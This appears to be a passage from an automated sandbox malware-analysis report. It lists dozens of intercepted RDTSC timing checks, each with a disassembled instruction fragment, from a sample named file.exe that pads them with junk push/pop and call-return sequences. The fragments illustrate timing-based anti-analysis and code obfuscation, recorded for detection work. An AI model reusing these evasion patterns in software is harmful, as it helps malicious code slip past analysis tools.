                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB87 second address: D6AB8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB8B second address: D6ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F1228D24ABBh 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D38FDh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F1228D24AB8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+122D3719h] 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c jnc 00007F1228D24AB8h 0x00000042 push esi 0x00000043 pushad 0x00000044 popad 0x00000045 pop esi 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ABE6 second address: D6ABEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ABEC second address: D6ABF6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1228D24ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6CBB4 second address: D6CC1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F122870CBC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D22A5h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F122870CBC8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 jne 00007F122870CBD9h 0x00000039 xchg eax, ebx 0x0000003a jnl 00007F122870CBD4h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FC3B second address: D6FC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d cld 0x0000000e pop edi 0x0000000f add dword ptr [ebp+12462954h], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F1228D24AB8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 jp 00007F1228D24ABCh 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ebx 0x0000003c push edx 0x0000003d pop edx 0x0000003e pop ebx 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70D62 second address: D70D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70D66 second address: D70D86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F1228D24AB6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F1228D24ABCh 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D01 second address: D72D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F122870CBC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D12 second address: D72D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FDE7 second address: D6FDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F122870CBC6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D16 second address: D72D20 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1228D24AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FDF1 second address: D6FDF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D20 second address: D72D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F1228D24ABFh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6FDF5 second address: D6FE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push edi 0x0000000c add ebx, dword ptr [ebp+12462633h] 0x00000012 pop edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, edx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, dword ptr [ebp+1246281Bh] 0x00000029 mov eax, dword ptr [ebp+122D0F15h] 0x0000002f mov bx, dx 0x00000032 push FFFFFFFFh 0x00000034 cld 0x00000035 sub dword ptr [ebp+12472FF5h], eax 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push edi 0x00000040 pop edi 0x00000041 jmp 00007F122870CBD2h 0x00000046 popad 0x00000047 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72D3D second address: D72D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B712 second address: D2B724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jns 00007F122870CBC6h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B724 second address: D2B742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B742 second address: D2B747 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75794 second address: D757FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1228D24AB8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+124621A2h], esi 0x00000031 mov bx, 6A13h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F1228D24AB8h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 sub dword ptr [ebp+12461FD3h], eax 0x00000057 mov ebx, dword ptr [ebp+122D3951h] 0x0000005d push eax 0x0000005e push ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 pop edi 0x00000063 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74A3C second address: D74A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74B10 second address: D74B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74B14 second address: D74B1E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7677C second address: D767FC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1228D24ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F1228D24AB8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F1228D24AC7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F1228D24AB8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D2887h] 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 jp 00007F1228D24AB6h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D767FC second address: D76801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76801 second address: D76806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76806 second address: D7681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F122870CBC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F122870CBCCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7681E second address: D76822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75907 second address: D759AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F122870CBC8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov ebx, dword ptr [ebp+122D27A1h] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov dword ptr [ebp+12482885h], esi 0x00000041 mov eax, dword ptr [ebp+122D0029h] 0x00000047 sub dword ptr [ebp+12461FD3h], edx 0x0000004d push FFFFFFFFh 0x0000004f mov ebx, dword ptr [ebp+122D3759h] 0x00000055 call 00007F122870CBD2h 0x0000005a jmp 00007F122870CBD5h 0x0000005f pop ebx 0x00000060 nop 0x00000061 pushad 0x00000062 jl 00007F122870CBC8h 0x00000068 jc 00007F122870CBD0h 0x0000006e jmp 00007F122870CBCAh 0x00000073 popad 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 jnl 00007F122870CBC6h 0x0000007f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D759AD second address: D759B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D759B1 second address: D759B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BEC7 second address: D6BED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EF9E second address: D6EFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EFA4 second address: D6F019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1228D24AC0h 0x0000000b jmp 00007F1228D24ABAh 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F1228D24AB8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov edi, 243CFC9Dh 0x00000031 lea eax, dword ptr [ebp+12494B9Fh] 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F1228D24AB8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov dword ptr [ebp+1245E44Eh], ebx 0x00000057 push eax 0x00000058 push esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F019 second address: D6F06B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx edx, bx 0x00000010 lea eax, dword ptr [ebp+12494B5Bh] 0x00000016 clc 0x00000017 nop 0x00000018 pushad 0x00000019 push eax 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop eax 0x0000001d pushad 0x0000001e jmp 00007F122870CBD8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F06B second address: D6F07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1228D24AB6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA870A second address: DA870E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8C4D second address: DA8C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8C53 second address: DA8C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8C57 second address: DA8C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC74B second address: DAC74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC74F second address: DAC77A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F1228D24ABCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F1228D24AC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF548 second address: DAF54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF134 second address: DAF13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB190B second address: DB1926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB14EE second address: DB14FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB14FD second address: DB1501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4DF7 second address: DB4E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1228D24AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAC5E second address: DBAC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F122870CBCAh 0x0000000d jmp 00007F122870CBCEh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAC83 second address: DBAC93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9556 second address: DB955B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB955B second address: DB9569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1228D24AB6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB981D second address: DB9856 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F122870CBCAh 0x00000013 push ecx 0x00000014 jmp 00007F122870CBCDh 0x00000019 jmp 00007F122870CBD3h 0x0000001e pop ecx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9B0D second address: DB9B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9C33 second address: DB9C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 jmp 00007F122870CBD8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E9B7 second address: D6E9C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1228D24AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E9C5 second address: D6E9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA99E second address: DBA9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA9A6 second address: DBA9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBCFh 0x00000009 je 00007F122870CBC6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA9C4 second address: DBA9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE85C second address: DBE866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE866 second address: DBE88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F1228D24AC4h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE88D second address: DBE893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE893 second address: DBE8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F1228D24AE0h 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2154F second address: D215A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F122870CBD4h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F122870CBD3h 0x00000019 jmp 00007F122870CBD3h 0x0000001e pushad 0x0000001f jp 00007F122870CBC6h 0x00000025 jp 00007F122870CBC6h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB65 second address: DBDB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1228D24AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB71 second address: DBDB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB79 second address: DBDB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB80 second address: DBDB86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB86 second address: DBDB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1228D24AB6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB90 second address: DBDBB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F122870CBD2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F122870CBC6h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDBB7 second address: DBDBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDBC7 second address: DBDBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD1h 0x00000009 rdtsc
